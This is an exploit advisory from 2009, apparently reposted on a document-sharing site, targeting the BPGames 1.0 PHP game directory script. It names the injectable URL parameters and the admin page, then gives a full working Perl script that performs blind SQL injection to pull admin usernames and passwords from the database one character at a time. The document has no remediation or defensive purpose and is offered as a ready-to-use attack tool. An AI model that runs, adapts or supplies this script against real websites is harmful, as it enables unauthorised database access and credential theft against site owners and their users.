Docstoc

BPGames 1.0 blind SQL Injection

Document Sample
BPGames 1.0 blind SQL Injection Powered By Docstoc
					                                            BPGames 1.0 blind SQL Injection         Page 1/3
  1    #[x]===================================================================[x]
  2    # |                     AntiSecurity[dot]org                            |
  3    #[x]===================================================================[x]
  4    # | Title               : BPGames 1.0 blind SQL Injection Exploit       |
  5    # | Software            : BPGames                                       |
  6    # | Vendor              : http://bpowerhouse.info                       |
  7    # | Date                : 22 September 2009 ( Indonesia )               |
  8    # | Author              : OoN_Boy                                       |
  9    # | Contact             : oon.boy9@gmail.com                            |
  10   # | Web                 : http://oonboy.info                            |
  11   # | Blog                : http://oonboy.blogspot.com                    |
  12   #[x]===================================================================[x]
  13   # | Technology          : PHP                                           |
  14   # | Database            : MySQL                                         |
  15   # | Version             : 1.0                                           |
  16   # | License             : GNU GPL                                       |
  17   # | Price               : $29.90                                        |
  18   # | Description         : is a game directory site script. The script   |
  19   # |                       supports multi−language settings. Site users |
  20   # |                       can search for games according to categories |
  21   #[x]===================================================================[x]
  22   # | Google Dork         : gwe ganteng :P                                |
  23   #[x]===================================================================[x]
  24   # | Exploit             : http://localhost/[path]/main.php?cat_id=[sql] |
  25   # |                       http://localhost/[path]/game.php?game_id=[sql]|
  26   # | Aadmin Page         : http://localhost/[path]/admin/index.php       |
  27   #[x]===================================================================[x]
  28   # | Greetz              : antisecurity.org batamhacker.or.id            |
  29   # |                       Vrs−hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
  30   # |                       yooogy mousekill }^−^{ martfella noname s4va |
  31   # |                       k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua |
  32   # |                       Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
  33   #[x]===================================================================[x]
  34
  35
  36   use HTTP::Request;
  37   use LWP::UserAgent;
  38
  39   $cmsapp   =   ’BPGames’;
  40   $vuln     =   ’main.php?cat_id=’; #change vuln game.php?game_id=
  41   #vuln     =   ’game.php?game_id=’;
  42   $string   =   ’Previous’;             #change if any string
  43   #string   =   ’Instrucciones’;
  44   $maxlen   =   32;
  45
  46   my $OS = "$^O";
  47   if ($OS eq ’MSWin32’) { system("cls"); } else { system("clear"); }
  48
  49   printf "\n
  50     $cmsapp
  51   [x]=================================================[x]
  52    | BPGames 1.0 blind SQL Injection Exploit |
OoN Boy                                                                             09/22/2009
                                                       BPGames 1.0 blind SQL Injection                   Page 2/3
  53    [x]=================================================[x]
  54
  55    \n";
  56
  57    print   " [+] URL Path : "; chomp($web=<STDIN>);
  58    print   " [+] Valid ID : "; chomp($id=<STDIN>);
  59    print   " [+] Table : "; chomp($table=<STDIN>);                  #table name admins
  60    print   " [+] Columns : "; chomp($columns=<STDIN>);              #column username and password
  61
  62    if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
  63
  64    print "\n\n [!] Exploiting $target ...\n\n";
  65    &get_data;
  66    print "\n\n [!] Mission completed.\n\n";
  67
  68    sub get_data() {
  69             @columns = split(/,/, $columns);
  70             foreach $column (@columns) {
  71                     print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
  72                     syswrite(STDOUT, " [−] $table\@$column> ", 255);
  73                     for (my $i=1; $i<=$maxlen; $i++) {
  74                              my $chr = 0;
  75                              my $found = 0;
  76                              my $char = 48;
  77                              while (!$chr && $char<=57) {
  78                                       if(exploit($i,$char) =~ /$string/) {
  79                                                 $chr = 1;
  80                                                 $found = 1;
  81                                                 syswrite(STDOUT,chr($char),1);
  82                                       } else { $found = 0; }
  83                                       $char++;
  84                              }
  85                              if(!$chr) {
  86                                       $char = 97;
  87                                       while(!$chr && $char<=122) {
  88                                                 if(exploit($i,$char) =~ /$string/) {
  89                                                           $chr = 1;
  90                                                           $found = 1;
  91                                                           syswrite(STDOUT,chr($char),1);
  92                                                 } else { $found = 0; }
  93                                                 $char++;
  94                                       }
  95                              }
  96                              if (!$found) {
  97                                       print "\n"; last;
  98                              }
  99                     }
  100            }
  101   }
  102
  103   sub exploit() {
  104            my $limit = $_[0];
OoN Boy                                                                                                  09/22/2009
                                              BPGames 1.0 blind SQL Injection                                           Page 3/3
  105            my $chars = $_[1];
  106            my $blind = ’+AND+SUBSTRING((SELECT+’.$column.’+FROM+’.$table.’+LIMIT+0,1),’.$limit.’,1)=CHAR(’.$chars.’)’;
  107            my $inject = $target.$vuln.$id.$blind;
  108            my $content = get_content($inject);
  109            return $content;
  110   }
  111
  112   sub get_content() {
  113            my $url = $_[0];
  114            my $req = HTTP::Request−>new(GET => $url);
  115            my $ua = LWP::UserAgent−>new();
  116            $ua−>timeout(5);
  117            my $res = $ua−>request($req);
  118            if ($res−>is_error){
  119                     print "\n\n [!] Error, ".$res−>status_line.".\n\n";
  120                     exit;
  121            }
  122            return $res−>content;
  123   }
  124
  125   # Exploit End




OoN Boy                                                                                                                 09/22/2009